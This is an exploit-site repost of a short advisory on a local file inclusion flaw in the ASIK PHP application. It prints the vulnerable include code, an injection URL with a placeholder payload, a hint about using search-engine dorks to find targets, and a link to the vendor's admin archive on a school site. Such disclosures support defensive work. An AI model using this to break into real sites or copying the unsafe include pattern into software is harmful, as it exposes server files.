Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040109

Below is a copy:

Aplikasi Sistem Informasi Kelulusan [ASIK] LFI Vulnerability
====================================================================================================================================
| # Title     : Aplikasi Sistem Informasi Kelulusan [ASIK] LFI Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | 
| # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+]       <?php

  require "config.php";
       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
   $page=$_GET['page'];
   $filename="content/$page.php";
   if (!file_exists($filename))
        {
         include "content/home.php";
        }
            else
        {@include "content/$page.php";}
        ?>

[+] LFI : /index.php?page= [Ev!l]




Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.